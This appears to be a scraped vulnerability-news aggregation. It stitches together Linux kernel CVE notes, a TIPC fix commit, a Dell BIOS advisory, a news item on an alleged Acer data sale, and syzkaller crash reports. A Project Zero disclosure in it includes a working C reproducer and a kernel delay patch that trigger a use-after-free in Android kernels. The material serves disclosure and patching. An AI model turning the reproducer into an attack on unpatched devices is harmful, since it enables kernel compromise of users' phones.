  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=20221018203258.2793282-1-edumazet@google.com \\
    --to=edumazet@google.com \\
    --cc=davem@davemloft.net \\
    --cc=dvyukov@google.com \\
    --cc=eric.dumazet@gmail.com \\
    --cc=kuba@kernel.org \\
    --cc=netdev@vger.kernel.org \\
    --cc=pabeni@redhat.com \\
    --cc=syzkaller@googlegroups.com \\
    --cc=xiyou.wangcong@gmail.com \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.

CVE-2023-0590: [PATCH net] net: sched: fix race condition in qdisc_graft()

In the Linux kernel before 6.1.3, fs/ntfs3/inode.c does not validate the attribute name offset. An unhandled page fault may occur.

CVE-2022-48424

A remote denial of service vulnerability was found in the Linux kernel’s TIPC kernel module. The while loop in tipc_link_xmit() hits an unknown state while attempting to parse SKBs, which are not in the queue. Sending two small UDP packets to a system with a UDP bearer results in the CPU utilization for the system to instantly spike to 100%, causing a denial of service condition.

Permalink

Browse files

tipc: fix NULL deref in tipc\_link\_xmit()

The buffer list can have zero skb as following path:
tipc\_named\_node\_up()->tipc\_node\_xmit()->tipc\_link\_xmit(), so
we need to check the list before casting an &sk\_buff.

Fault report:
 \[\] tipc: Bulk publication failure
 \[\] general protection fault, probably for non-canonical \[#1\] PREEMPT \[...\]
 \[\] KASAN: null-ptr-deref in range \[0x00000000000000c8-0x00000000000000cf\]
 \[\] CPU: 0 PID: 0 Comm: swapper/0 Kdump: loaded Not tainted 5.10.0-rc4+ #2
 \[\] Hardware name: Bochs ..., BIOS Bochs 01/01/2011
 \[\] RIP: 0010:tipc\_link\_xmit+0xc1/0x2180
 \[\] Code: 24 b8 00 00 00 00 4d 39 ec 4c 0f 44 e8 e8 d7 0a 10 f9 48 \[...\]
 \[\] RSP: 0018:ffffc90000006ea0 EFLAGS: 00010202
 \[\] RAX: dffffc0000000000 RBX: ffff8880224da000 RCX: 1ffff11003d3cc0d
 \[\] RDX: 0000000000000019 RSI: ffffffff886007b9 RDI: 00000000000000c8
 \[\] RBP: ffffc90000007018 R08: 0000000000000001 R09: fffff52000000ded
 \[\] R10: 0000000000000003 R11: fffff52000000dec R12: ffffc90000007148
 \[\] R13: 0000000000000000 R14: 0000000000000000 R15: ffffc90000007018
 \[\] FS:  0000000000000000(0000) GS:ffff888037400000(0000) knlGS:000\[...\]
 \[\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
 \[\] CR2: 00007fffd2db5000 CR3: 000000002b08f000 CR4: 00000000000006f0

Fixes: af9b028 ("tipc: make media xmit call outside node spinlock context")
Acked-by: Jon Maloy <jmaloy@redhat.com>
Signed-off-by: Hoang Le <hoang.h.le@dektech.com.au>
Link: https://lore.kernel.org/r/20210108071337.3598-1-hoang.h.le@dektech.com.au
Signed-off-by: Jakub Kicinski <kuba@kernel.org>

*   Loading branch information

CVE-2023-1390: tipc: fix NULL deref in tipc_link_xmit() · torvalds/linux@b774134

Dell BIOS contains an Improper Input Validation vulnerability. A local authenticated malicious user with administrator privileges could potentially exploit this vulnerability to perform arbitrary code execution.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs** 

**CVE Description**

**More information**

CVE-2023-24571

Dell BIOS contains an Improper Input Validation vulnerability. A local authenticated malicious user with administrator privileges could potentially exploit this vulnerability to perform arbitrary code execution.

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H  
See NVD (http://nvd.nist.gov/) for individual scores for each CVE.  
 

**Proprietary Code CVEs** 

**CVE Description**

**More information**

CVE-2023-24571

Dell BIOS contains an Improper Input Validation vulnerability. A local authenticated malicious user with administrator privileges could potentially exploit this vulnerability to perform arbitrary code execution.

CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H  
See NVD (http://nvd.nist.gov/) for individual scores for each CVE.  
 

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**BIOS Update Version**

**BIOS Release Date**

Embedded Box PC 3000

1.18.0

03/10/2023

**NOTE**: The table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.  

**Product**

**BIOS Update Version**

**BIOS Release Date**

Embedded Box PC 3000

1.18.0

03/10/2023

**NOTE**: The table above may not be a comprehensive list of all affected supported versions and may be updated as more information becomes available.  

**Keinoja ongelman kiertämiseen tai lieventämiseen**

None

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2023-03-15

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

15 maalisk. 2023

CVE-2023-24571: DSA-2023-046: Dell Client Platform Security Update for BIOS Vulnerabilities

Dell BIOS contains an Improper Authorization vulnerability. An unauthenticated physical attacker may potentially exploit this vulnerability, leading to denial of service.

CVE-2022-46752

By Waqas
A hacker on a popular forum is claiming to have stolen Acer Inc.'s data in mid-February 2023.
This is a post from HackRead.com Read the original post: Acer Data Breach? Hacker Claims to Sell 160GB Trove of Stolen Data

****The hacker claims that it took them days to go through the list of what had been allegedly breached.****

Acer Inc., a major global technology company based in Taiwan, is facing a potential data breach from a hacker going by the alias “Kernelware.” The hacker is claiming responsibility for a major **data breach at Acer Inc**., a leading multinational company based in Taiwan that designs and sells hardware and electronics products.

According to Kernelware, the alleged breach occurred in mid-February 2023 and resulted in the theft of a vast amount of sensitive information, totalling 160GB of 655 directories and 2869 files.

In a post on a hacker forum that surfaced as an alternative to the popular and **now-seized Raidforums**, Kernelware offered to sell the data trove to interested parties, saying that it contained a wide range of valuable files and documents. The hacker also shared a sample of the stolen data to prove its authenticity.

Post on the hacker forum (Image credit: Hackread.com)

The list of items included confidential slides and presentations, technical manuals, Windows Imaging Format files, binaries of various types, backend infrastructure data, product model documentation, and information about phones, tablets, laptops, and other devices.

The alleged data also contained Replacement Digital Product Keys, ISO files, Windows System Deployment Image files, BIOS components, and ROM files.

Kernelware requested payment in **XMR (Monero)**, a privacy-focused cryptocurrency, and suggested using a middleman to ensure a successful sale. Although it is still unclear whether the data is genuine, the hacker’s willingness to use a third-party and their confidence in the quality of the stolen information indicates that the threat should be taken seriously.

> _“Honestly, there’s so much s\*\*t that it’ll take me days to go through the list of what was breached lol.”_
> 
> _Kernelware_

**Acer Inc**. has not yet commented on the alleged data breach or the potential sale of its confidential data. However, if verified, the data could provide valuable insights and competitive advantages to Acer’s rivals or malicious actors seeking to exploit the vulnerabilities of its products and services.

The stolen information could be used by cybercriminals for various purposes, including blackmail, identity theft, and fraud. Additionally, the exposure of Acer’s backend infrastructure and product models could reveal vulnerabilities that could be exploited by other attackers.

As always, individuals and organizations are advised to take measures to protect their sensitive data and systems, including using strong passwords, implementing multi-factor authentication, keeping their software and firmware up-to-date, and monitoring for signs of suspicious activity.

The threat of data breaches and cyberattacks is ongoing and evolving, and it requires constant vigilance and preparedness to mitigate the risks.

1.  **PayPal sued over data breach of 35,000 users**
2.  **Acer online store hacked; 34,000 user data stolen**
3.  **System hijacking flaws in pre-installed Acer software**
4.  **Acer flaw allows malware infection during secure boot**
5.  **Hackers stole GoDaddy source code in multi-year breach**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Acer Data Breach? Hacker Claims to Sell 160GB Trove of Stolen Data

Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to multiple use-after-free conditions.

    Android: GKI kernels contain broken non-upstream Speculative Page Faults MM codeA central recurring theme in Linux MM development is that contention on themmap lock can have a big negative performance impact on multithreaded workloads:If one thread is holding the mmap lock in exclusive mode for an extended amountof time, other threads will block as soon as they try to handle a page fault.Therefore there is a bunch of work to downgrade exclusive lock holders tonon-exclusive lock holders, shrink critical sections, and avoid holding the lockaltogether in some cases.One proposal to avoid holding the mmap lock in page fault handling are\"Speculative page faults (SPF)\"; here's a patch series from 2019 that had alreadygone through 11 rounds of review:<https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/>This patch series didn't land at the time; but something along those lines mightland upstream in the next few years.But for some reason, Android decided that they need speculative page faultsimmediately, and merged the patches that were discussed on the upstream mailinglist into their GKI kernels. This is problematic for two reasons:A) The MM code is complicated and easy to get wrong.   If you run MM code that has not been through the fuzzing, testing and review   that committed upstream code gets, there's a higher chance of undiscovered   bugs.B) The SPF patches **change the rules** that MM code has to follow, so now   Android's version of MM has different rules than upstream MM.   This means that any patches in vaguely related parts of upstream MM need to   be checked by an Android engineer to see if they conflict with Android's   special rules.As far as I can tell, there are a bunch of memory safety bugs in the SPF versionthat is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):1. handle_pte_fault() calls pmd_none() without protection against concurrent   page table deletion, leading to UAF read.2. do_anonymous_page() calls pte_alloc() without protection against concurrent   page table deletion, leading to UAF write.3. do_anonymous_page() calls pmd_trans_unstable() without protection against   concurrent page table deletion, leading to UAF read.4. do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates   on a page table without protection against concurrent page table deletion,   leading to use-after-union-change read+write in struct page (on the page   table lock) and use-after-free read of a page table entry (resulting in bogus   page* calculation)5. do_wp_page() calls handle_userfault() without protection against concurrent   userfaultfd_release(), leading to UAF reads of some flags from   userfaultfd_ctx.   I think back when the SPF series was posted upstream, there might have been   sufficient protection against this (because ___handle_speculative_fault()   bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd   support was added, and ___handle_speculative_fault() doesn't bail on   VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses   userfaultfd_pte_wp() which reads flags from the VMA.6. The way seqcounts are used to detect concurrent writers looks wrong.   The seqcount API requires that only one writer at a time can be in a   vm_write_begin() / vm_write_end() section, but these helpers are used in   codepaths that only hold the mmap lock in shared mode, so there can be   concurrent writers.   As far as I can tell, this means that when there are an even number of   concurrent writers, it will look as if there are no active writers.   This _probably_ doesn't have much security impact because all of the places   that do vm_write_begin() where concurrency would be an actual problem seem to   hold the mmap lock in exclusive mode?As an example, I tested issue 2. To reproduce this easily, I patched an extradelay into the kernel:```diff --git a/mm/memory.c b/mm/memory.cindex 83b715ed65775..35ce412d0a965 100644--- a/mm/memory.c+++ b/mm/memory.c@@ -84,6 +84,8 @@ #include <asm/tlb.h> #include <asm/tlbflush.h> +#include <linux/delay.h>+ #include \"pgalloc-track.h\" #include \"internal.h\" @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault *vmf)        vm_fault_t ret = 0;        pte_t entry; +       if (strcmp(current->comm, \"SLOWME\") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {+               pr_warn(\"%s: BEGIN DELAY 0x%lx\\", __func__, vmf->address);+               mdelay(2000);+               pr_warn(\"%s: END DELAY 0x%lx\\", __func__, vmf->address);+       }+        /* File mapping without ->vm_ops ? */        if (vmf->vma_flags & VM_SHARED)                return VM_FAULT_SIGBUS;```Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:```#define _GNU_SOURCE#include <pthread.h>#include <err.h>#include <unistd.h>#include <sys/prctl.h>#include <sys/mman.h>// basic idea:// delete the 1G-covering page table while do_anonymous_page() is at its entry// point#define VMA_ADDR ((void*)0x40000000UL)#define VMA_SIZE (0x40000000UL)#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})static void *thread_fn(void *dummy) {  SYSCHK(prctl(PR_SET_NAME, \"SLOWME\"));  *(volatile char *)VMA_ADDR;  SYSCHK(prctl(PR_SET_NAME, \"spfthread\"));}int main(void) {  SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,                        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));  SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));  // create anon_vma and page tables  *(volatile char *)(VMA_ADDR+0x1000) = 1;  pthread_t thread;  if (pthread_create(&thread, NULL, thread_fn, NULL))    errx(1, \"pthread_create\");  sleep(1);  munmap(VMA_ADDR, VMA_SIZE);  if (pthread_join(thread, NULL))    errx(1, \"pthread_join\");  return 0;}```This first results in a UAF read of a PTE:```do_anonymous_page: BEGIN DELAY 0x40000000do_anonymous_page: END DELAY 0x40000000==================================================================BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) Read of size 8 at addr ffff88800f358000 by task SLOWME/724CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014Call Trace:dump_stack_lvl (lib/dump_stack.c:120) [...]print_address_description.constprop.0 (mm/kasan/report.c:257) [...][...]kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460) [...]handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687) [...]___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106) [...]__handle_speculative_fault (mm/memory.c:5148) [...]do_user_addr_fault (arch/x86/mm/fault.c:1320) [...]exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518) [...]asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571) RIP: 0033:0x55d52bfe41fb```Then pte_alloc() tries to lock the page table entry:```BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112) Read of size 4 at addr ffff88801a730004 by task SLOWME/724```and after that, it will write into the freed page table.From a security perspective, my recommendation is to fix this by reverting thespeculative page fault patches out of the GKI trees, since I believe that sucha divergence from upstream semantics is not maintainable. Looking through thecommit history of the AOSP android13-5.10 kernel branch also shows that a seriesof bugs have already been discovered that were introduced by SPF:81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPFc3cbea92297d5 ANDROID: mm: avoid writing to read-only elementsdd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handlingcf397c6c269ac ANDROID: mm: sync rss in speculative page fault path531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page faultThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-02-01.Please note that, according to our disclosure policy, if Project Zero discoversa variant of a previously reported Project Zero bug, technical details of thevariant will be added to the existing Project Zero report (which may be alreadypublic) and the report will not receive a new deadline.Project Zero will consider new race conditions where the SPF fault path accessespage tables or the VMA without sufficient locking variants of this issue.This includes issues that are introduced after this bug is reported.For more details, seehttps://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Related CVE Number: CVE-2023-20937.Found by: jannh@google.com

Android GKI Kernels Contain Broken Non-Upstream Speculative Page Faults MM Code

In the Linux kernel 6.0.8, there is a use-after-free in ntfs_trim_fs in fs/ntfs3/bitmap.c.

Hello,  
I found the following issue using syzkaller on:  
HEAD commit : e60276b8c11ab4a8be23807bc67b04  
8cfb937dfa (v6.0.8)  
git tree: stable

C Reproducer : https://gist.github.com/oswalpalash/113c274067bc9c4c653a6dd09fb2e456  
Kernel .config :  
https://gist.github.com/oswalpalash/0962c70d774e5ec736a047bba917cecb

Console log :

\==================================================================  
BUG: KASAN: use-after-free in ntfs\_trim\_fs+0x84e/0x960  
Read of size 2 at addr ffff888104fea640 by task syz-executor.0/8081

CPU: 1 PID: 8081 Comm: syz-executor.0 Not tainted 6.0.8-pasta #2  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS  
1.13.0-1ubuntu1.1 04/01/2014  
Call Trace:  
<TASK>  
dump\_stack\_lvl+0xcd/0x134  
print\_report.cold+0xe5/0x63a  
kasan\_report+0x8a/0x1b0  
ntfs\_trim\_fs+0x84e/0x960  
ntfs\_ioctl\_fitrim+0x23e/0x340  
ntfs\_ioctl+0x9c/0xd0  
\_\_x64\_sys\_ioctl+0x193/0x200  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd  
RIP: 0033:0x7fac7f88eacd  
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48  
89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d  
01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48  
RSP: 002b:00007fac805f9bf8 EFLAGS: 00000246 ORIG\_RAX: 0000000000000010  
RAX: ffffffffffffffda RBX: 00007fac7f9bbf80 RCX: 00007fac7f88eacd  
RDX: 0000000020000040 RSI: 00000000c0185879 RDI: 0000000000000003  
RBP: 00007fac7f8fcb05 R08: 0000000000000000 R09: 0000000000000000  
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000  
R13: 00007ffcb363e05f R14: 00007ffcb363e200 R15: 00007fac805f9d80  
</TASK>

Allocated by task 8074:  
kasan\_save\_stack+0x1e/0x40  
\_\_kasan\_kmalloc+0xa6/0xd0  
\_\_kmalloc+0x349/0xd40  
tomoyo\_encode2.part.0+0xec/0x3b0  
tomoyo\_encode+0x28/0x50  
tomoyo\_realpath\_from\_path+0x186/0x620  
tomoyo\_path\_perm+0x219/0x420  
security\_inode\_getattr+0xcf/0x140  
vfs\_getattr+0x22/0x60  
vfs\_fstat+0x49/0x90  
\_\_do\_sys\_newfstat+0x81/0x100  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Freed by task 8074:  
kasan\_save\_stack+0x1e/0x40  
kasan\_set\_track+0x21/0x30  
kasan\_set\_free\_info+0x20/0x30  
\_\_kasan\_slab\_free+0xf5/0x180  
kfree+0x15e/0x540  
tomoyo\_path\_perm+0x240/0x420  
security\_inode\_getattr+0xcf/0x140  
vfs\_getattr+0x22/0x60  
vfs\_fstat+0x49/0x90  
\_\_do\_sys\_newfstat+0x81/0x100  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

The buggy address belongs to the object at ffff888104fea640  
which belongs to the cache kmalloc-32 of size 32  
The buggy address is located 0 bytes inside of  
32-byte region \[ffff888104fea640, ffff888104fea660)

The buggy address belongs to the physical page:  
page:ffffea000413fa80 refcount:1 mapcount:0 mapping:0000000000000000  
index:0xffff888104feafc1 pfn:0x104fea  
flags: 0x57ff00000000200(slab|node=1|zone=2|lastcpupid=0x7ff)  
raw: 057ff00000000200 ffffea00043f1b88 ffffea000414bec8 ffff888011840100  
raw: ffff888104feafc1 ffff888104fea000 000000010000003d 0000000000000000  
page dumped because: kasan: bad access detected  
page\_owner tracks the page as allocated  
page last allocated via order 0, migratetype Unmovable, gfp\_mask  
0x2420c0(\_\_GFP\_IO|\_\_GFP\_FS|\_\_GFP\_NOWARN|\_\_GFP\_COMP|\_\_GFP\_THISNODE),  
pid 6509, tgid 6509 (syz-executor.3), ts 50269499850, free\_ts  
50269456139  
prep\_new\_page+0x2c6/0x350  
get\_page\_from\_freelist+0xae9/0x3a80  
\_\_alloc\_pages+0x321/0x710  
cache\_grow\_begin+0x75/0x360  
kmem\_cache\_alloc\_node\_trace+0xbe2/0xd40  
\_\_kmalloc\_node+0x38/0x60  
\_\_vmalloc\_node\_range+0x3d3/0x1320  
vzalloc+0x67/0x80  
alloc\_counters.isra.0+0x5d/0x6f0  
do\_ipt\_get\_ctl+0x5de/0x980  
nf\_getsockopt+0x72/0xd0  
ip\_getsockopt+0x164/0x1c0  
tcp\_getsockopt+0x86/0xd0  
\_\_sys\_getsockopt+0x216/0x690  
\_\_x64\_sys\_getsockopt+0xba/0x150  
do\_syscall\_64+0x35/0xb0  
page last free stack trace:  
free\_pcp\_prepare+0x5ab/0xd00  
free\_unref\_page+0x19/0x410  
\_\_vunmap+0x6ff/0xaa0  
\_\_vfree+0x3c/0xd0  
vfree+0x5a/0x90  
do\_ipt\_get\_ctl+0x7b2/0x980  
nf\_getsockopt+0x72/0xd0  
ip\_getsockopt+0x164/0x1c0  
tcp\_getsockopt+0x86/0xd0  
\_\_sys\_getsockopt+0x216/0x690  
\_\_x64\_sys\_getsockopt+0xba/0x150  
do\_syscall\_64+0x35/0xb0  
entry\_SYSCALL\_64\_after\_hwframe+0x63/0xcd

Memory state around the buggy address:  
ffff888104fea500: fa fb fb fb fc fc fc fc 02 fc fc fc fc fc fc fc  
ffff888104fea580: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
\>ffff888104fea600: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
^  
ffff888104fea680: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
ffff888104fea700: fa fb fb fb fc fc fc fc fa fb fb fb fc fc fc fc  
\==================================================================

Tag

#bios